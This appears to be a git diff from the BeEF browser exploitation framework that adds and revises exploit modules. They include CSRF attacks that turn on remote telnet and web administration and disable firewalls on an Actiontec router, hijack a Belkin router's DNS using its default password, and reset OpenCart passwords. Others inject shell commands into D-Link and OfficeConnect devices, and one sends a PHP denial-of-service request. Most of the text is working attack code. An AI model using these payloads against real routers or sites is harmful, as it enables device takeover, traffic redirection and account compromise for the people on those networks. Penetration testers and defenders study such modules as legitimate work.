setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
15
modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
Normal file
15
modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
dlink_sharecenter_cmd_exec:
|
||||
enable: true
|
||||
category: ["Exploits", "NAS"]
|
||||
name: "D-Link ShareCenter Command Execution"
|
||||
description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
|
||||
authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
23
modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
Normal file
23
modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
Normal file
@@ -0,0 +1,23 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
###
|
||||
# This module has not been tested. For more information see:
|
||||
# http://blog.emaze.net/2012_02_01_archive.html
|
||||
# http://www.securityfocus.com/archive/1/521532
|
||||
###
|
||||
class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
|
||||
{'name'=>'cmd', 'ui_label'=>'Command', 'value'=>'ls'}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
@@ -5,17 +5,18 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var base = '<%= @base %>';
|
||||
var service = '<%= @service %>';
|
||||
var action = '<%= @action %>';
|
||||
var base = '<%= @base %>';
|
||||
var password = '<%= @password %>';
|
||||
|
||||
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
|
||||
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
|
||||
var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
|
||||
{'type':'hidden', 'name':'password', 'value':password},
|
||||
{'type':'hidden', 'name':'confirm', 'value':password}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(zenoss_daemon_iframe);
|
||||
document.body.removeChild(opencart_reset_password_iframe);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
|
||||
15
modules/exploits/opencart_reset_password/config.yaml
Normal file
15
modules/exploits/opencart_reset_password/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
opencart_reset_password:
|
||||
enable: true
|
||||
category: "Exploits"
|
||||
name: "Opencart Reset Password CSRF"
|
||||
description: "Attempts to reset an Opencart user's password."
|
||||
authors: ["Saadat Ullah", "bcoles"]
|
||||
target:
|
||||
unknown: ["ALL"]
|
||||
20
modules/exploits/opencart_reset_password/module.rb
Normal file
20
modules/exploits/opencart_reset_password/module.rb
Normal file
@@ -0,0 +1,20 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
# This module has not been tested
|
||||
class Opencart_reset_password < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
|
||||
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
@@ -32,7 +32,7 @@ function serializeObj (obj) {
|
||||
}
|
||||
|
||||
// Run attack
|
||||
function attackSite (target_url) {
|
||||
function php_dos (target_url) {
|
||||
var bad = serializeObj(createEvilObj());
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", target_url, true);
|
||||
@@ -42,10 +42,10 @@ function attackSite (target_url) {
|
||||
}
|
||||
|
||||
try {
|
||||
attackSite("<%= @url %>");
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
|
||||
php_dos("<%= @url %>");
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
|
||||
} catch (e) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
|
||||
}
|
||||
|
||||
});
|
||||
|
||||
@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content['result'] = @datastore['result']
|
||||
content['result'] = @datastore['result'] if not @datastore['result'].nil?
|
||||
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
|
||||
save content
|
||||
end
|
||||
|
||||
|
||||
@@ -30,12 +30,12 @@ beef.execute(function() {
|
||||
}
|
||||
|
||||
// send commands
|
||||
var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload);
|
||||
var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
// clean up
|
||||
cleanup = function() {
|
||||
document.body.removeChild(qnx_iframe);
|
||||
document.body.removeChild(qnx_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
|
||||
@@ -9,8 +9,9 @@ beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var path = 'utility.cgi';
|
||||
var cmd = '<%= @cmd %>';
|
||||
var timeout = 15;
|
||||
|
||||
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
{'type':'hidden', 'name':'testType', 'value':'1'},
|
||||
{'type':'hidden', 'name':'IP', 'value':'||'+cmd}
|
||||
]);
|
||||
@@ -18,9 +19,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(com_officeconnect_iframe);
|
||||
document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
52
modules/exploits/router/actiontec_q1000_csrf/command.js
Normal file
52
modules/exploits/router/actiontec_q1000_csrf/command.js
Normal file
@@ -0,0 +1,52 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var gateway = '<%= @base %>';
|
||||
var user = '<%= @user %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var port = '<%= @port %>';
|
||||
var timeout = 15;
|
||||
|
||||
var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
|
||||
{'type':'hidden', 'name':'serCtlHttp', 'value':'1'},
|
||||
{'type':'hidden', 'name':'adminUserName', 'value':user},
|
||||
{'type':'hidden', 'name':'adminPassword', 'value':passwd},
|
||||
{'type':'hidden', 'name':'remGuiTimeout', 'value':'0'},
|
||||
{'type':'hidden', 'name':'remGuiPort', 'value':port}
|
||||
]);
|
||||
|
||||
var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
|
||||
{'type':'hidden', 'name':'serCtlTelnet', 'value':'1'},
|
||||
{'type':'hidden', 'name':'remTelUser', 'value':user},
|
||||
{'type':'hidden', 'name':'remTelPass', 'value':passwd},
|
||||
{'type':'hidden', 'name':'remTelTimeout', 'value':'0'},
|
||||
{'type':'hidden', 'name':'remTelPassChanged', 'value':'1'}
|
||||
]);
|
||||
|
||||
var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
|
||||
{'type':'hidden', 'name':'fwLevel', 'value':'Basic'},
|
||||
{'type':'hidden', 'name':'fwStealthMode', 'value':'0'}
|
||||
]);
|
||||
|
||||
var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
|
||||
{'type':'hidden', 'name':'ipv6_fwlevel', 'value':'basic'},
|
||||
{'type':'hidden', 'name':'ipv6_fwenable', 'value':'0'}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
|
||||
document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
|
||||
document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
15
modules/exploits/router/actiontec_q1000_csrf/config.yaml
Normal file
15
modules/exploits/router/actiontec_q1000_csrf/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
actiontec_q1000_csrf:
|
||||
enable: true
|
||||
category: ["Exploits", "Router"]
|
||||
name: "Actiontec Q1000 CSRF"
|
||||
description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
|
||||
authors: ["james-otten"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
21
modules/exploits/router/actiontec_q1000_csrf/module.rb
Normal file
21
modules/exploits/router/actiontec_q1000_csrf/module.rb
Normal file
@@ -0,0 +1,21 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Actiontec_q1000_csrf < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
|
||||
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
|
||||
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
|
||||
{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
@@ -14,7 +14,7 @@ beef.execute(function() {
|
||||
img.setAttribute("style","visibility:hidden");
|
||||
img.setAttribute("width","0");
|
||||
img.setAttribute("height","0");
|
||||
img.id = 'asmax_ar804gu';
|
||||
img.id = 'asmax_ar804gu_<%= @command_id %>';
|
||||
img.src = gateway+path+cmd;
|
||||
document.body.appendChild(img);
|
||||
|
||||
|
||||
70
modules/exploits/router/belkin_dns_csrf/command.js
Normal file
70
modules/exploits/router/belkin_dns_csrf/command.js
Normal file
@@ -0,0 +1,70 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
// config
|
||||
var gateway = '<%= @base %>';
|
||||
var path = '/cgi-bin/setup_dns.exe';
|
||||
var dns = '<%= @dns %>';
|
||||
var timeout = 15;
|
||||
|
||||
// validate DNS server IP address
|
||||
var parts = dns.split('.');
|
||||
if (parts.length != 4) {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
|
||||
return;
|
||||
}
|
||||
for (var i=0; i<parts.length; i++) {
|
||||
var part = parts[i];
|
||||
if (isNaN(part) || part < 0 || part > 255) {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
|
||||
return;
|
||||
}
|
||||
}
|
||||
var dns_1 = parts[0];
|
||||
var dns_2 = parts[1];
|
||||
var dns_3 = parts[2];
|
||||
var dns_4 = parts[3];
|
||||
|
||||
// attempt auth with default password (admin)
|
||||
// incorrect login attempts do not log out an authenticated session
|
||||
var img = new Image();
|
||||
img.setAttribute("style", "visibility:hidden");
|
||||
img.setAttribute("width", "0");
|
||||
img.setAttribute("height","0");
|
||||
img.id = 'belkin_auth_<%= @command_id %>';
|
||||
img.src = gateway+"/cgi-bin/login.exe?pws=admin";
|
||||
document.body.appendChild(img);
|
||||
|
||||
// change DNS
|
||||
var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
|
||||
{'type':'hidden', 'name':'dns1_1', 'value':dns_1},
|
||||
{'type':'hidden', 'name':'dns1_2', 'value':dns_2},
|
||||
{'type':'hidden', 'name':'dns1_3', 'value':dns_3},
|
||||
{'type':'hidden', 'name':'dns1_4', 'value':dns_4},
|
||||
{'type':'hidden', 'name':'dns2_1', 'value':dns_1},
|
||||
{'type':'hidden', 'name':'dns2_2', 'value':dns_2},
|
||||
{'type':'hidden', 'name':'dns2_3', 'value':dns_3},
|
||||
{'type':'hidden', 'name':'dns2_4', 'value':dns_4},
|
||||
{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
|
||||
{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
|
||||
{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
|
||||
{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
|
||||
{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
// clean up
|
||||
cleanup = function() {
|
||||
document.body.removeChild(belkin_iframe_<%= @command_id %>);
|
||||
document.body.removeChild(belkin_auth_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
15
modules/exploits/router/belkin_dns_csrf/config.yaml
Normal file
15
modules/exploits/router/belkin_dns_csrf/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
belkin_dns_csrf:
|
||||
enable: true
|
||||
category: ["Exploits", "Router"]
|
||||
name: "Belkin DNS Hijack CSRF"
|
||||
description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
unknown: ["ALL"]
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user